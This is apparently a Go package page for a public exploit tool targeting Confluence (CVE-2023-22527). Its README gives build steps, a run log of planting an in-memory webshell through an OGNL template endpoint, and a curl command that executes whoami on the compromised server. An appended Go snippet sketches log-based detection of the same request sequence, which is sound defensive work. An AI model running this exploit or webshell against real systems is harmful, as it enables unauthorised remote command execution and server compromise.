webshell

command module
v0.0.0-...-1b4b94d
Published: Apr 17, 2024 License: Apache-2.0 Imports: 13 Imported by: 0

README

In Memory Confluence Webshell

This exploit loads a webshell into Confluence's memory. The webshell is implemented in ABCDEFG.java, although a random name is assigned to it at exploitation time. After exploitation, the attacker can execute arbitrary programs via curl.

Compiling

To build a docker image:

make docker

If you have a Go and Java build environment handy, you can also just use make:

albinolobster@mournland:~/cve-2023-22527/webshell$ make
gofmt -d -w cve-2023-22527.go 
golangci-lint run --fix cve-2023-22527.go
javac ABCDEFG.java -classpath ./lib/servlet-api.jar
Note: ABCDEFG.java uses or overrides a deprecated API.
Note: Recompile with -Xlint:deprecation for details.
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-22527_linux-arm64 cve-2023-22527.go

Usage Example

Add the webshell:

albinolobster@mournland:~/cve-2023-22527/webshell$ sudo docker run -it --network=host webshell -a -v -c -e -rhost 10.9.49.76 -rport 8090
time=2024-03-05T16:34:21.251Z level=STATUS msg="Starting target" index=0 host=10.9.49.76 port=8090 ssl=false "ssl auto"=true
time=2024-03-05T16:34:21.390Z level=STATUS msg="Validating Confluence target" host=10.9.49.76 port=8090
time=2024-03-05T16:34:23.094Z level=SUCCESS msg="Target verification succeeded!" host=10.9.49.76 port=8090 verified=true
time=2024-03-05T16:34:23.094Z level=STATUS msg="Running a version check on the remote target" host=10.9.49.76 port=8090
time=2024-03-05T16:34:23.334Z level=VERSION msg="The self-reported version is: 8.5.3" host=10.9.49.76 port=8090 version=8.5.3
time=2024-03-05T16:34:23.334Z level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.76 port=8090 vulnerable=yes
time=2024-03-05T16:34:23.334Z level=STATUS msg="Sending OGNL expression size limit adjustment to http://10.9.49.76:8090/template/aui/text-inline.vm"
time=2024-03-05T16:34:23.520Z level=STATUS msg="Sending class VbbsGkzxox to http://10.9.49.76:8090/template/aui/text-inline.vm"
time=2024-03-05T16:34:23.720Z level=SUCCESS msg="In memory webshell available using VicodMajitk param"
time=2024-03-05T16:34:23.720Z level=SUCCESS msg="Example usage: curl -kv http://10.9.49.76:8090/?VicodMajitk=whoami"
time=2024-03-05T16:34:23.720Z level=SUCCESS msg="Exploit successfully completed" exploited=true

Use the webshell:

albinolobster@mournland:~/cve-2023-22527/webshell$ curl http://10.9.49.76:8090/?VicodMajitk=whoami
nt authority\network service
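
Detection sketch for the sequence shown in the log above, written for this page as an added example (it is not part of the project's code): it flags requests to /template/aui/text-inline.vm and, for the same client afterwards, requests to / that carry a query parameter. The access-log layout, the client addresses and the names Scan, Finding and sampleLog are assumptions made for the example.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Constructed sample lines in an assumed common-log layout; not from a real server.
var sampleLog = []string{
	`192.0.2.10 - - [05/Mar/2024:16:34:23 +0000] "POST /template/aui/text-inline.vm HTTP/1.1" 200 310`,
	`192.0.2.10 - - [05/Mar/2024:16:34:23 +0000] "POST /template/aui/text-inline.vm HTTP/1.1" 200 0`,
	`198.51.100.7 - - [05/Mar/2024:16:35:02 +0000] "GET /?src=mail HTTP/1.1" 302 0`,
	`192.0.2.10 - - [05/Mar/2024:16:36:40 +0000] "GET /?VicodMajitk=whoami HTTP/1.1" 200 29`,
	`198.51.100.7 - - [05/Mar/2024:16:37:11 +0000] "GET /dashboard.action HTTP/1.1" 200 8841`,
}

var reqLine = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"`)

// Finding is one flagged log line and the reason it was flagged (hypothetical type).
type Finding struct{ Client, Reason, Target string }

// Scan flags requests to the template path named in the exploit log and, for the
// same client afterwards, requests to "/" that carry any query string.
func Scan(lines []string) []Finding {
	var out []Finding
	touched := map[string]bool{} // clients that have requested the template path
	for _, l := range lines {
		m := reqLine.FindStringSubmatch(l)
		if m == nil {
			continue
		}
		path, query, _ := strings.Cut(m[2], "?")
		switch {
		case strings.EqualFold(path, "/template/aui/text-inline.vm"):
			touched[m[1]] = true
			out = append(out, Finding{m[1], "template-endpoint", m[2]})
		case path == "/" && query != "" && touched[m[1]]:
			out = append(out, Finding{m[1], "root-query-after-template", m[2]})
		}
	}
	return out
}

func main() {
	for _, f := range Scan(sampleLog) {
		fmt.Printf("%-26s %s %s\n", f.Reason, f.Client, f.Target)
	}
}
```

Correlating by client address misses follow-up requests sent from a different source, so template-endpoint hits are worth reviewing on their own. Because the class name and parameter name are randomised per run, the rule matches on the request path and sequence rather than on those strings.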

Documentation

There is no documentation for this package.